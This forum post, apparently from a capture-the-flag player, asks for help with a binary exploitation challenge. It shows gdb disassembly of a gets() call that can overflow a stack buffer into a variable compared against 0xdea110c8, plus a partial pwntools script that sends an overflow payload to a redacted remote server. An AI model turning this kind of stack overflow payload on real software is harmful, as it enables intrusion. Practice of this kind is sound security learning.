inspectorderick Posted February 28, 2019 Report Share Posted February 28, 2019 Hello i've a problem to solve, a binary exploitation this is my output gdb 0x004008a6 <+301>: lea eax,[ebp-0x3b]0x004008a9 <+304>: push eax0x004008aa <+305>: call 0x400520 <gets@plt>0x004008af <+310>: add esp,0x100x004008b2 <+313>: cmp DWORD PTR [ebp-0x10],0xdea110c80x004008b9 <+320>: jne 0x4008c2 <main+329>0x004008bb <+322>: call 0x4006fd <print_flag>0x004008c0 <+327>: jmp 0x4008d4 <main+347> this is my program in python from pwn import *r = remote("***************.com", 4321)payload = "A"*i + "\xc8\x10\xa1\xde"r.send("Sir Lancelot of Camelot\n")print r.recv(4096)r.send("To seek the Holy Grail.\n")print r.recv(4096)r.send(payload)print r.recv(4096) My goal is to jump the comparaison to access the function witch print the flag some advise or help are welcome thanks Quote Link to comment Share on other sites More sharing options...